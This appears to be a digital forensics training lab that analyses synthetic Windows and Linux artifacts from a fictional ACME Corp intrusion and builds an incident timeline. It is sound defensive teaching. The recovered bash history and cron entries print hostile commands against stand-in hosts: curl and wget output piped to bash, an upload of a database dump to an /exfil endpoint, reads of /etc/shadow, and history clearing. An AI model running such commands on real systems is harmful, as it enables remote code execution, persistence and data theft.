Skip to content

Lab 12: DFIR Artifact Analysis

Chapter: 27 — Digital Forensics Difficulty: ⭐⭐⭐ Advanced Estimated Time: 3–4 hours Prerequisites: Chapter 27, basic forensics knowledge, familiarity with hex editors

Overview

In this lab you will:

  1. Parse and analyze synthetic Windows forensic artifacts ($MFT, Prefetch, Registry, Event Logs)
  2. Examine browser artifacts and LNK files to reconstruct user activity
  3. Analyze Linux forensic artifacts (auth logs, bash history, network connections, cron)
  4. Correlate artifacts across multiple sources to build an incident timeline
  5. Use industry-standard DFIR tools (Autopsy, Volatility3, plaso) against synthetic data
  6. Map findings to MITRE ATT&CK techniques

Synthetic Data Only

All data in this lab is 100% synthetic and fictional. All IP addresses use RFC 5737 (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) or RFC 1918 (10.0.0.0/8, 172.16.0.0/12) reserved ranges. All hashes are clearly labeled SYNTHETIC and follow 0x00...00 patterns. No real malware, real hosts, or real threat actors are referenced.

Scenario

Incident Brief — ACME Corp

Organization: ACME Corp (fictional) Internal Network: 10.0.1.0/24 Affected Host: WIN-DESK-042 (10.0.1.42) — Windows 10 workstation Affected User: jsmith (domain: ACME\jsmith) Incident Start: 2026-03-15 14:23 UTC Report Time: 2026-03-15 16:45 UTC Threat Actor Designation: SYNTHETIC-APT-1 (fictional)

Summary: The ACME Corp SOC detected unusual outbound traffic from WIN-DESK-042 to external IP 192.0.2.1 on port 443. The IR team collected a forensic image and memory dump. Preliminary analysis suggests the user visited a compromised website, downloaded a malicious executable, and the threat actor established persistence and attempted lateral movement. A Linux jump server (10.0.1.100) was also compromised.

Part 1: Windows Artifact Analysis

1.1 $MFT Entry Analysis

The Master File Table ($MFT) is the core metadata structure of NTFS. Every file and directory on the volume has at least one MFT entry. Below is a synthetic hex dump of the MFT entry for the malware binary discovered on WIN-DESK-042.

Offset    00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F   ASCII
--------  -----------------------------------------------   ----------------
00000000  46 49 4C 45 30 00 03 00  A4 1F 00 00 00 00 00 00   FILE0...........
00000010  01 00 01 00 38 00 01 00  A0 01 00 00 00 04 00 00   ....8...........
00000020  00 00 00 00 00 00 00 00  04 00 00 00 2B 6E 00 00   ............+n..
00000030  02 00 00 00 00 00 00 00  10 00 00 00 60 00 00 00   ............`...
00000040  00 00 18 00 00 00 00 00  48 00 00 00 18 00 00 00   ........H.......
00000050  00 E4 9E 3A 5B 7C D2 01  00 E4 9E 3A 5B 7C D2 01   ...:[\|.....:[\|.
00000058  00 E4 9E 3A 5B 7C D2 01  00 E4 9E 3A 5B 7C D2 01   ...:[\|.....:[\|.
00000060  20 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00    ...............
00000070  30 00 00 00 68 00 00 00  00 00 18 00 00 00 03 00   0...h...........
00000080  50 00 00 00 18 00 01 00  05 00 00 00 00 00 05 00   P...............
00000090  00 E4 9E 3A 5B 7C D2 01  00 60 B7 42 5B 7C D2 01   ...:[\|..`.B[\|.
000000A0  00 60 B7 42 5B 7C D2 01  00 60 B7 42 5B 7C D2 01   .`.B[\|..`.B[\|.
000000B0  00 C0 01 00 00 00 00 00  00 C0 01 00 00 00 00 00   ................
000000C0  20 00 00 00 00 00 00 00  13 00 6D 00 61 00 6C 00    .........m.a.l.
000000D0  77 00 61 00 72 00 65 00  5F 00 53 00 59 00 4E 00   w.a.r.e._.S.Y.N.
000000E0  54 00 48 00 45 00 54 00  49 00 43 00 2E 00 65 00   T.H.E.T.I.C...e.
000000F0  78 00 65 00 00 00 00 00  80 00 00 00 48 00 00 00   x.e.....€...H...

SYNTHETIC Artifact

This hex dump is entirely fabricated for educational purposes. The timestamps and structures are illustrative.

Key fields to parse:

Offset Field Value Interpretation
0x00–0x03 Magic Number 46 49 4C 45 "FILE" — valid MFT entry signature
0x30–0x33 Attribute Type 10 00 00 00 $STANDARD_INFORMATION (0x10)
0x50–0x57 SI Created 00 E4 9E 3A 5B 7C D2 01 2026-03-15T14:21:43Z (SYNTHETIC)
0x58–0x5F SI Modified 00 E4 9E 3A 5B 7C D2 01 2026-03-15T14:21:43Z (SYNTHETIC)
0x70–0x73 Attribute Type 30 00 00 00 $FILE_NAME (0x30)
0x90–0x97 FN Created 00 E4 9E 3A 5B 7C D2 01 2026-03-15T14:21:43Z (SYNTHETIC)
0x98–0x9F FN Modified 00 60 B7 42 5B 7C D2 01 2026-03-15T14:23:01Z (SYNTHETIC)
0xC2–0xEF Filename Unicode: malware_SYNTHETIC.exe 19 chars, UTF-16LE
0xF0–0xF3 Attribute Type 80 00 00 00 $DATA (0x80) — file content

Timestamp Analysis:

$STANDARD_INFORMATION timestamps:
  Created:    2026-03-15T14:21:43Z
  Modified:   2026-03-15T14:21:43Z
  MFT Mod:    2026-03-15T14:21:43Z
  Accessed:   2026-03-15T14:21:43Z

$FILE_NAME timestamps:
  Created:    2026-03-15T14:21:43Z
  Modified:   2026-03-15T14:23:01Z
  MFT Mod:    2026-03-15T14:23:01Z
  Accessed:   2026-03-15T14:23:01Z

Timestomping Detection

When $STANDARD_INFORMATION timestamps are all identical but $FILE_NAME timestamps differ, this can indicate timestomping. In this case, the SI timestamps were set to file creation time, but the FN timestamps show the file was actually modified ~80 seconds later — suggesting the malware wrote itself and then stomped its own timestamps.

Alternate Data Stream (ADS) Detection:

The MFT entry also reveals an Alternate Data Stream attached to the file:

Attribute: $DATA (0x80)  Named Stream: "Zone.Identifier"
Content:
  [ZoneTransfer]
  ZoneId=3
  ReferrerUrl=http://attacker.example/downloads/
  HostUrl=http://attacker.example/downloads/malware_SYNTHETIC.exe
Analysis Takeaway
  • The Zone.Identifier ADS confirms the file was downloaded from the internet (ZoneId=3)
  • The referrer URL points to attacker.example — the threat actor's distribution site
  • The file was created at 14:21:43Z, approximately 2 minutes before the first C2 communication at 14:23 UTC

1.2 Prefetch Analysis

Windows Prefetch files record application execution metadata. Below is the parsed output of the Prefetch file for the malicious executable.

File: C:\WINDOWS\PREFETCH\MALWARE_SYNTHETIC.EXE-A1B2C3D4.pf

Header:
  Version:          30 (Windows 10)
  Signature:        SCCA
  File Size:        42,688 bytes

Execution Information:
  Executable Name:  MALWARE_SYNTHETIC.EXE
  Prefetch Hash:    A1B2C3D4 (SYNTHETIC)
  Run Count:        3
  Last Run Time:    2026-03-15T14:23:01Z
  Previous Runs:
    [1] 2026-03-15T14:22:15Z
    [2] 2026-03-15T14:21:48Z

Volume Information:
  Volume Path:      \DEVICE\HARDDISKVOLUME2
  Volume Serial:    DEAD-BEEF (SYNTHETIC)
  Creation Time:    2024-01-15T08:00:00Z

Loaded Files/DLLs (18 total):
  \DEVICE\HARDDISKVOLUME2\WINDOWS\SYSTEM32\NTDLL.DLL
  \DEVICE\HARDDISKVOLUME2\WINDOWS\SYSTEM32\KERNEL32.DLL
  \DEVICE\HARDDISKVOLUME2\WINDOWS\SYSTEM32\KERNELBASE.DLL
  \DEVICE\HARDDISKVOLUME2\WINDOWS\SYSTEM32\ADVAPI32.DLL
  \DEVICE\HARDDISKVOLUME2\WINDOWS\SYSTEM32\MSVCRT.DLL
  \DEVICE\HARDDISKVOLUME2\WINDOWS\SYSTEM32\WS2_32.DLL          ← Network socket library
  \DEVICE\HARDDISKVOLUME2\WINDOWS\SYSTEM32\WINHTTP.DLL         ← HTTP client library
  \DEVICE\HARDDISKVOLUME2\WINDOWS\SYSTEM32\CRYPT32.DLL         ← Cryptography library
  \DEVICE\HARDDISKVOLUME2\WINDOWS\SYSTEM32\BCRYPT.DLL          ← Crypto primitives
  \DEVICE\HARDDISKVOLUME2\WINDOWS\SYSTEM32\DNSAPI.DLL          ← DNS resolution
  \DEVICE\HARDDISKVOLUME2\USERS\JSMITH\DOWNLOADS\MALWARE_SYNTHETIC.EXE
  \DEVICE\HARDDISKVOLUME2\USERS\JSMITH\APPDATA\LOCAL\TEMP\SYNTH_PAYLOAD.DLL
  \DEVICE\HARDDISKVOLUME2\WINDOWS\SYSTEM32\CMD.EXE
  \DEVICE\HARDDISKVOLUME2\WINDOWS\SYSTEM32\NET.EXE
  \DEVICE\HARDDISKVOLUME2\WINDOWS\SYSTEM32\WHOAMI.EXE
  \DEVICE\HARDDISKVOLUME2\WINDOWS\SYSTEM32\IPCONFIG.EXE
  \DEVICE\HARDDISKVOLUME2\WINDOWS\SYSTEM32\TASKLIST.EXE
  \DEVICE\HARDDISKVOLUME2\WINDOWS\SYSTEM32\REG.EXE

Suspicious Indicators

  • WS2_32.DLL + WINHTTP.DLL + DNSAPI.DLL: Network capability — the malware can make outbound connections
  • CRYPT32.DLL + BCRYPT.DLL: Encryption capability — data exfiltration or encrypted C2
  • SYNTH_PAYLOAD.DLL in TEMP: Dropped a second-stage payload
  • cmd.exe, net.exe, whoami.exe, ipconfig.exe, tasklist.exe, reg.exe: Discovery and reconnaissance commands — classic post-exploitation behavior
  • Run count of 3: Executed multiple times in rapid succession (2 minutes)

1.3 Registry Persistence

The threat actor established persistence via the Windows Registry Run key. Below is the extracted registry artifact.

Registry Hive: SYSTEM (mounted from forensic image)
Key Path: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Last Write Time: 2026-03-15T14:24:12Z

Values:
  Name:     SecurityHealthSystray  (legitimate — Windows Security)
  Type:     REG_SZ
  Data:     %windir%\system32\SecurityHealthSystray.exe

  Name:     SyntheticSvcHost                          ← SUSPICIOUS
  Type:     REG_SZ
  Data:     C:\Users\jsmith\AppData\Local\Temp\synth_payload.dll,MainEntry
  Added:    2026-03-15T14:24:12Z (SYNTHETIC)

Additional registry artifacts found:

Key: HKLM\SYSTEM\CurrentControlSet\Services\SyntheticSvc
Last Write Time: 2026-03-15T14:24:30Z

Values:
  DisplayName:  Synthetic Health Monitor Service
  ImagePath:    C:\Users\jsmith\AppData\Local\Temp\synth_payload.dll
  Start:        2 (Auto Start)
  Type:         16 (Win32 Own Process)
  Description:  System health monitoring service (SYNTHETIC)

Key: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist
GUID: {CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}

Decoded Entries (ROT13):
  C:\Users\jsmith\Downloads\malware_SYNTHETIC.exe
    Run Count:  1
    Last Run:   2026-03-15T14:21:48Z
    Focus Time: 2 seconds

Key: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache

Entries (most recent first):
  [0] C:\Users\jsmith\Downloads\malware_SYNTHETIC.exe
      Modified: 2026-03-15T14:21:43Z
      Size:     114688 bytes (112 KB)
      Executed: True

  [1] C:\Users\jsmith\AppData\Local\Temp\synth_payload.dll
      Modified: 2026-03-15T14:22:15Z
      Size:     86016 bytes (84 KB)
      Executed: True
Timeline Correlation
Time (UTC) Artifact Event
14:21:43 $MFT, ShimCache malware_SYNTHETIC.exe created on disk
14:21:48 Prefetch, UserAssist First execution of malware_SYNTHETIC.exe
14:22:15 Prefetch, ShimCache synth_payload.dll dropped and loaded
14:23:01 Prefetch Third execution / C2 communication begins
14:24:12 Registry Run key Persistence established via Run key
14:24:30 Registry Services Persistence established via service

1.4 Windows Event Log Analysis

The following synthetic EVTX entries were extracted from the forensic image. They are presented in XML format as they would appear when parsed from the binary EVTX file.

Event 4688 — Process Creation

<!-- SYNTHETIC Event Log Entry — Process Creation -->
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{00000000-0000-0000-0000-000000000001}"/>
    <EventID>4688</EventID>
    <Version>2</Version>
    <Level>0</Level>
    <Task>13312</Task>
    <TimeCreated SystemTime="2026-03-15T14:23:15.000Z"/>
    <EventRecordID>110042</EventRecordID>
    <Computer>WIN-DESK-042.acme.local</Computer>
    <Channel>Security</Channel>
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-0000000000-0000000001-0000000002-1001</Data>
    <Data Name="SubjectUserName">jsmith</Data>
    <Data Name="SubjectDomainName">ACME</Data>
    <Data Name="NewProcessId">0x1A2B</Data>
    <Data Name="NewProcessName">C:\Windows\System32\cmd.exe</Data>
    <Data Name="ParentProcessName">C:\Users\jsmith\Downloads\malware_SYNTHETIC.exe</Data>
    <Data Name="CommandLine">cmd.exe /c whoami &amp; ipconfig /all &amp; tasklist &amp; net user</Data>
    <Data Name="TokenElevationType">%%1936</Data>
  </EventData>
</Event>

Key Finding

malware_SYNTHETIC.exe spawned cmd.exe with a reconnaissance command chain: whoami, ipconfig /all, tasklist, and net user. This is a classic discovery technique used immediately after initial access.

Event 7045 — Service Installation

<!-- SYNTHETIC Event Log Entry — Service Install -->
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Service Control Manager" Guid="{00000000-0000-0000-0000-000000000002}"/>
    <EventID>7045</EventID>
    <Version>0</Version>
    <Level>4</Level>
    <TimeCreated SystemTime="2026-03-15T14:24:30.000Z"/>
    <EventRecordID>8847</EventRecordID>
    <Computer>WIN-DESK-042.acme.local</Computer>
    <Channel>System</Channel>
  </System>
  <EventData>
    <Data Name="ServiceName">SyntheticSvc</Data>
    <Data Name="ImagePath">C:\Users\jsmith\AppData\Local\Temp\synth_payload.dll</Data>
    <Data Name="ServiceType">user mode service</Data>
    <Data Name="StartType">auto start</Data>
    <Data Name="AccountName">LocalSystem</Data>
  </EventData>
</Event>

Persistence via Service

A service named SyntheticSvc was installed to run as LocalSystem with auto start. The binary path points to the user's TEMP directory — a strong indicator of malicious activity. Legitimate services do not run from user temp folders.

Event 4624 — Successful Logon (Lateral Movement)

<!-- SYNTHETIC Event Log Entry — Lateral Movement Logon -->
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{00000000-0000-0000-0000-000000000001}"/>
    <EventID>4624</EventID>
    <Version>2</Version>
    <Level>0</Level>
    <TimeCreated SystemTime="2026-03-15T14:32:07.000Z"/>
    <EventRecordID>110089</EventRecordID>
    <Computer>WIN-SRV-DC01.acme.local</Computer>
    <Channel>Security</Channel>
  </System>
  <EventData>
    <Data Name="SubjectUserName">-</Data>
    <Data Name="TargetUserName">jsmith</Data>
    <Data Name="TargetDomainName">ACME</Data>
    <Data Name="LogonType">3</Data>
    <Data Name="LogonProcessName">NtLmSsp</Data>
    <Data Name="AuthenticationPackageName">NTLM</Data>
    <Data Name="WorkstationName">WIN-DESK-042</Data>
    <Data Name="IpAddress">10.0.1.42</Data>
    <Data Name="IpPort">49832</Data>
  </EventData>
</Event>

Event 4625 — Failed Logon (Lateral Movement Attempts)

<!-- SYNTHETIC Event Log Entry — Failed Lateral Movement -->
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{00000000-0000-0000-0000-000000000001}"/>
    <EventID>4625</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <TimeCreated SystemTime="2026-03-15T14:30:45.000Z"/>
    <EventRecordID>110085</EventRecordID>
    <Computer>WIN-SRV-DC01.acme.local</Computer>
    <Channel>Security</Channel>
  </System>
  <EventData>
    <Data Name="TargetUserName">administrator</Data>
    <Data Name="TargetDomainName">ACME</Data>
    <Data Name="Status">0xC000006D</Data>
    <Data Name="SubStatus">0xC000006A</Data>
    <Data Name="LogonType">3</Data>
    <Data Name="IpAddress">10.0.1.42</Data>
    <Data Name="IpPort">49821</Data>
  </EventData>
</Event>

Lateral Movement Sequence

Between 14:30 and 14:32 UTC, WIN-DESK-042 (10.0.1.42) attempted multiple logons to the domain controller:

Time (UTC) Event Target User Result
14:30:45 4625 administrator Failed (bad password)
14:30:52 4625 administrator Failed (bad password)
14:31:03 4625 admin Failed (no such user)
14:31:15 4625 svc_backup Failed (bad password)
14:32:07 4624 jsmith Success (Type 3 — Network)

The attacker tried credential stuffing against privileged accounts, then fell back to using the compromised user's own credentials for network logon.

1.5 Browser Artifacts

Chrome browser history and download records were extracted from the user profile.

Chrome History (SQLite: History database)

-- SYNTHETIC browser history entries
-- Table: urls
-- Extracted from: C:\Users\jsmith\AppData\Local\Google\Chrome\User Data\Default\History

id  | url                                                    | title                        | visit_count | last_visit_time
----|--------------------------------------------------------|------------------------------|-------------|---------------------------
847 | http://192.0.2.1/gate.php                              | (no title)                   | 4           | 2026-03-15T14:23:01Z
848 | http://192.0.2.1/gate.php?id=WIN-DESK-042&status=alive | (no title)                   | 2           | 2026-03-15T14:25:00Z
849 | http://attacker.example/downloads/                     | Index of /downloads          | 1           | 2026-03-15T14:20:30Z
850 | http://attacker.example/downloads/malware_SYNTHETIC.exe| (download)                   | 1           | 2026-03-15T14:21:10Z
851 | https://legitimate-news.example/article/12345          | Daily News - Tech Update     | 1           | 2026-03-15T14:18:45Z

Chrome Downloads

-- Table: downloads
id  | target_path                                            | url                                                     | start_time              | received_bytes | total_bytes | state
----|--------------------------------------------------------|---------------------------------------------------------|-------------------------|----------------|-------------|------
201 | C:\Users\jsmith\Downloads\malware_SYNTHETIC.exe        | http://attacker.example/downloads/malware_SYNTHETIC.exe | 2026-03-15T14:21:10Z    | 114688         | 114688      | 1 (Complete)

Browser Artifact Timeline

  1. 14:18:45 — User visited legitimate news site (possible watering hole or social engineering lure)
  2. 14:20:30 — Navigated to attacker.example/downloads/ (open directory listing)
  3. 14:21:10 — Downloaded malware_SYNTHETIC.exe (114,688 bytes / 112 KB)
  4. 14:23:01 — First C2 beacon to 192.0.2.1/gate.php
  5. 14:25:00 — C2 check-in with host identifier

1.6 LNK File Analysis

Windows creates LNK (shortcut) files in the Recent Items folder when files are accessed. The following LNK file was recovered.

File: C:\Users\jsmith\AppData\Roaming\Microsoft\Windows\Recent\malware_SYNTHETIC.lnk

LNK Header:
  Header Size:       0x0000004C (76 bytes)
  CLSID:             00021401-0000-0000-C000-000000000046
  Flags:             HasTargetIDList | HasLinkInfo | HasRelativePath

Target File:
  Path:              C:\Users\jsmith\Downloads\malware_SYNTHETIC.exe
  File Size:         114,688 bytes
  File Attributes:   FILE_ATTRIBUTE_ARCHIVE

Timestamps:
  Target Created:    2026-03-15T14:21:43Z
  Target Modified:   2026-03-15T14:21:43Z
  Target Accessed:   2026-03-15T14:21:48Z
  LNK Created:       2026-03-15T14:21:48Z

Volume Information:
  Drive Type:        DRIVE_FIXED
  Volume Serial:     DEAD-BEEF (SYNTHETIC)
  Volume Label:      (none)

Machine Info:
  Machine ID:        win-desk-042 (NetBIOS name, lowercase)
  MAC Address:       00:00:5E:00:53:42 (SYNTHETIC — RFC 7042 documentation range)
LNK Correlation

The LNK file confirms:

  • The file malware_SYNTHETIC.exe was opened/executed by the user (LNK creation = user interaction)
  • The LNK creation time (14:21:48Z) matches the Prefetch first-run time and UserAssist timestamp
  • The MAC address 00:00:5E:00:53:42 provides a hardware identifier for the workstation

Part 2: Linux Artifact Analysis

The IR team also examined a Linux jump server at 10.0.1.100 that the threat actor pivoted to.

2.1 SSH Authentication Log

# /var/log/auth.log (SYNTHETIC — 10.0.1.100)
# Showing relevant entries around incident timeframe

Mar 15 14:35:01 linux-jump-01 sshd[4521]: Failed password for root from 192.0.2.100 port 43210 ssh2
Mar 15 14:35:02 linux-jump-01 sshd[4522]: Failed password for root from 192.0.2.100 port 43211 ssh2
Mar 15 14:35:02 linux-jump-01 sshd[4523]: Failed password for root from 192.0.2.100 port 43212 ssh2
Mar 15 14:35:03 linux-jump-01 sshd[4524]: Failed password for root from 192.0.2.100 port 43213 ssh2
Mar 15 14:35:03 linux-jump-01 sshd[4525]: Failed password for invalid user admin from 192.0.2.100 port 43214 ssh2
Mar 15 14:35:04 linux-jump-01 sshd[4526]: Failed password for invalid user test from 192.0.2.100 port 43215 ssh2
...
# [841 similar failed entries omitted — total 847 failed attempts from 192.0.2.100]
...
Mar 15 14:42:17 linux-jump-01 sshd[5368]: Failed password for deploy from 192.0.2.100 port 44057 ssh2
Mar 15 14:42:18 linux-jump-01 sshd[5369]: Failed password for deploy from 192.0.2.100 port 44058 ssh2
Mar 15 14:42:19 linux-jump-01 sshd[5370]: Accepted password for deploy from 192.0.2.100 port 44059 ssh2
Mar 15 14:42:19 linux-jump-01 sshd[5370]: pam_unix(sshd:session): session opened for user deploy(uid=1001) by (uid=0)
Mar 15 14:42:22 linux-jump-01 sudo:   deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/bin/bash
Mar 15 14:42:22 linux-jump-01 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by deploy(uid=1001)

Brute Force Attack

  • 847 failed SSH attempts from 192.0.2.100 over ~7 minutes (14:35–14:42 UTC)
  • Targeted usernames: root, admin, test, ubuntu, deploy, and others
  • Success on attempt 848: user deploy with password authentication
  • Immediately escalated to root via sudo /bin/bash
  • Source IP 192.0.2.100 is in the RFC 5737 documentation range (SYNTHETIC)

2.2 Bash History

# /home/deploy/.bash_history (SYNTHETIC)
# Recovered from linux-jump-01 (10.0.1.100)

whoami
id
uname -a
cat /etc/passwd
cat /etc/shadow
ifconfig -a
netstat -tulpn
wget http://attacker.example/tool.sh -O /tmp/tool.sh && bash /tmp/tool.sh
curl -s http://192.0.2.1:8080/beacon | bash
cat /etc/crontab
crontab -l
echo "* * * * * curl -s http://192.0.2.1:8080/beacon | bash" | crontab -
ls -la /var/www/html/
cat /var/www/html/config.php
mysql -u root -pSYNTHETIC_PASSWORD_123 -e "SELECT user,host FROM mysql.user;"
tar czf /tmp/dbdump.tar.gz /var/backups/mysql/
curl -X POST http://192.0.2.1:8080/exfil -F "data=@/tmp/dbdump.tar.gz"
history -c

Post-Exploitation Activity

The bash history reveals a complete post-exploitation playbook:

  1. Discovery: whoami, id, uname -a, cat /etc/passwd, netstat
  2. Download & Execute: wget ... | bash and curl ... | bash — downloaded and ran remote scripts
  3. Persistence: Installed a cron job beaconing to C2 every minute
  4. Credential Access: Read /etc/shadow, dumped MySQL user table
  5. Data Exfiltration: Compressed database backups and uploaded them to C2
  6. Anti-Forensics: history -c — attempted to clear bash history (but file was already synced to disk)

2.3 Network Connections (/proc/net/tcp)

# /proc/net/tcp snapshot from memory capture (SYNTHETIC)
# Captured: 2026-03-15T14:50:00Z

  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345
   1: 6401000A:0016 6400020A:C3A8 01 00000000:00000000 00:00000000 00000000  1001        0 23456
   2: 6401000A:B5A4 010002C0:115C 01 00000000:00000000 02:00000B3C 00000000  1001        0 34567
   3: 6401000A:0050 2801000A:E1F0 06 00000000:00000000 00:00000000 00000000    33        0 45678

Decoded connections:

# Local Address Remote Address State Interpretation
0 127.0.0.1:22 0.0.0.0:0 LISTEN SSH daemon listening (normal)
1 10.0.1.100:22 10.0.2.100:50088 ESTABLISHED Inbound SSH session (attacker)
2 10.0.1.100:46500 192.0.2.1:4444 ESTABLISHED Reverse shell to C2
3 10.0.1.100:80 10.0.1.40:57840 TIME_WAIT Web request (closing)

Active C2 Connection

Connection #2 shows an ESTABLISHED TCP connection from the jump server to 192.0.2.1:4444 — the same C2 IP seen in the Windows artifacts. Port 4444 is a common default for reverse shells (e.g., Metasploit). The connection belongs to UID 1001 (user deploy).

How to decode /proc/net/tcp

The addresses in /proc/net/tcp are in hexadecimal, little-endian format:

  • 6401000A = 0A.00.01.64 = 10.0.1.100
  • 010002C0 = C0.02.00.01 = 192.0.2.1
  • 115C = 4444 (decimal port)
  • State 01 = ESTABLISHED, 0A = LISTEN, 06 = TIME_WAIT

2.4 Cron Persistence

# crontab -l -u deploy (SYNTHETIC)
# Retrieved from linux-jump-01 (10.0.1.100)

# Malicious entry added by threat actor:
* * * * * curl -s http://192.0.2.1:8080/beacon | bash

# Legitimate entries (pre-existing):
0 2 * * * /usr/local/bin/backup.sh
30 * * * * /usr/local/bin/health-check.sh

Additional persistence found in /etc/cron.d/:

# /etc/cron.d/synthetic-persist (SYNTHETIC)
# Created: 2026-03-15T14:45:00Z

@reboot curl -s http://192.0.2.1:8080/install | bash
*/5 * * * * deploy curl -s http://192.0.2.1:8080/beacon -o /dev/null

Dual Persistence Mechanism

The threat actor installed two cron-based persistence mechanisms:

  1. User crontab (crontab -e): Beacons every minute
  2. System cron (/etc/cron.d/): Reinstalls on reboot, beacons every 5 minutes

Both use curl | bash — downloading and executing code directly from the C2 server. This means the attacker can change the payload at any time without modifying the compromised host.

Part 3: Tool-Based Analysis

3.1 Autopsy — File System Timeline

# Import the forensic image into Autopsy
# File > New Case > Add Data Source > Disk Image

# After ingest modules complete, navigate to:
# Tools > Timeline

# Filter to incident window:
# Start: 2026-03-15 14:00:00 UTC
# End:   2026-03-15 15:00:00 UTC

Time (UTC)          | Type     | Source        | Description
--------------------|----------|---------------|-------------------------------------------
2026-03-15 14:18:45 | WEB      | Chrome History| Visited legitimate-news.example
2026-03-15 14:20:30 | WEB      | Chrome History| Visited attacker.example/downloads/
2026-03-15 14:21:10 | WEB      | Chrome DL     | Downloaded malware_SYNTHETIC.exe
2026-03-15 14:21:43 | FS       | $MFT Created  | malware_SYNTHETIC.exe written to disk
2026-03-15 14:21:48 | FS/REG   | Prefetch/UA   | malware_SYNTHETIC.exe first execution
2026-03-15 14:22:15 | FS       | $MFT Created  | synth_payload.dll dropped to Temp
2026-03-15 14:23:01 | FS/NET   | Prefetch      | Third run — C2 beacon to 192.0.2.1
2026-03-15 14:23:15 | LOG      | Event 4688    | cmd.exe spawned (recon commands)
2026-03-15 14:24:12 | REG      | Run Key       | Persistence: SyntheticSvcHost added
2026-03-15 14:24:30 | LOG      | Event 7045    | Service installed: SyntheticSvc
2026-03-15 14:30:45 | LOG      | Event 4625    | Failed logon to DC (lateral movement)
2026-03-15 14:32:07 | LOG      | Event 4624    | Successful logon to DC (Type 3)
2026-03-15 14:35:01 | LOG      | auth.log      | SSH brute force begins (192.0.2.100)
2026-03-15 14:42:19 | LOG      | auth.log      | SSH brute force succeeds (deploy)
2026-03-15 14:45:00 | FS       | cron.d        | Cron persistence installed
2026-03-15 14:50:00 | NET      | /proc/net/tcp | Reverse shell active to 192.0.2.1:4444

# Autopsy Keyword Search results for "192.0.2.1":
#
# Hits: 7
# Sources:
#   - Chrome History database (2 hits)
#   - malware_SYNTHETIC.exe strings (1 hit)
#   - synth_payload.dll strings (1 hit)
#   - Windows DNS cache (1 hit)
#   - Prefetch metadata (1 hit)
#   - pagefile.sys carved strings (1 hit)

3.2 Volatility3 — Memory Analysis

$ vol3 -f WIN-DESK-042.mem windows.pslist.PsList

PID    PPID   ImageFileName          CreateTime                    Threads  Handles  SessionId
----   ----   --------------------   ---------------------------   -------  -------  ---------
4      0      System                 2026-03-15T08:00:01.000Z      142      -        -
568    4      smss.exe               2026-03-15T08:00:02.000Z      2        -        -
648    568    csrss.exe              2026-03-15T08:00:05.000Z      12       -        0
...
3412   2840   explorer.exe           2026-03-15T08:15:30.000Z      28       987      1
5928   3412   chrome.exe             2026-03-15T14:15:00.000Z      8        342      1
6104   3412   malware_SYNTHETIC.exe  2026-03-15T14:21:48.000Z      4        156      1
6208   6104   cmd.exe                2026-03-15T14:23:15.000Z      1        42       1
6312   6208   whoami.exe             2026-03-15T14:23:16.000Z      1        28       1
6340   6208   ipconfig.exe           2026-03-15T14:23:17.000Z      1        30       1
6388   6208   tasklist.exe           2026-03-15T14:23:18.000Z      1        35       1
6420   6208   net.exe                2026-03-15T14:23:19.000Z      1        32       1
6500   6104   synth_payload.dll      2026-03-15T14:22:15.000Z      3        89       1

Process Tree Analysis

explorer.exe (3412)
├── chrome.exe (5928)
└── malware_SYNTHETIC.exe (6104)      ← Malicious parent
    ├── cmd.exe (6208)                 ← Spawned shell
    │   ├── whoami.exe (6312)          ← Discovery
    │   ├── ipconfig.exe (6340)        ← Discovery
    │   ├── tasklist.exe (6388)        ← Discovery
    │   └── net.exe (6420)             ← Discovery
    └── synth_payload.dll (6500)       ← Second stage

$ vol3 -f WIN-DESK-042.mem windows.malfind.Malfind

PID    Process                  Start VAddr      End VAddr        Tag     Protection         Hexdump (first 64 bytes)
----   ----------------------   ---------------  ---------------  ------  -----------------  ------------------------------------------
6104   malware_SYNTHETIC.exe    0x0000020A0000   0x0000020A3000   VadS    PAGE_EXECUTE_RW    4D 5A 90 00 03 00 00 00 (SYNTHETIC)
6500   synth_payload.dll        0x00000F1A0000   0x00000F1A5000   VadS    PAGE_EXECUTE_RW    4D 5A 90 00 03 00 00 00 (SYNTHETIC)

Suspicious: 2 processes with PAGE_EXECUTE_READWRITE memory regions containing PE headers (MZ signature)

Injected Code Detected

Both malicious processes contain memory regions with PAGE_EXECUTE_READWRITE protection and embedded PE headers (4D 5A = "MZ"). This strongly suggests unpacked or injected code — legitimate processes rarely have RWX memory regions with PE signatures.

$ vol3 -f WIN-DESK-042.mem windows.netscan.NetScan

Offset             Proto   LocalAddr        LocalPort  ForeignAddr      ForeignPort  State         PID    Owner
-----------------  ------  ---------------  ---------  ---------------  -----------  -----------   ----   ----------------------
0x0000aabbccdd01   TCPv4   10.0.1.42        49800      192.0.2.1        443          ESTABLISHED   6104   malware_SYNTHETIC.exe
0x0000aabbccdd02   TCPv4   10.0.1.42        49832      10.0.1.10        445          ESTABLISHED   6104   malware_SYNTHETIC.exe
0x0000aabbccdd03   TCPv4   10.0.1.42        49821      10.0.1.10        135          CLOSED        6420   net.exe
0x0000aabbccdd04   TCPv4   10.0.1.42        50100      192.0.2.1        8080         ESTABLISHED   6500   synth_payload.dll
0x0000aabbccdd05   UDPv4   10.0.1.42        137        *                *            -             4      System
0x0000aabbccdd06   TCPv4   10.0.1.42        80         *                *            LISTENING     1200   httpd.exe

Network Indicators

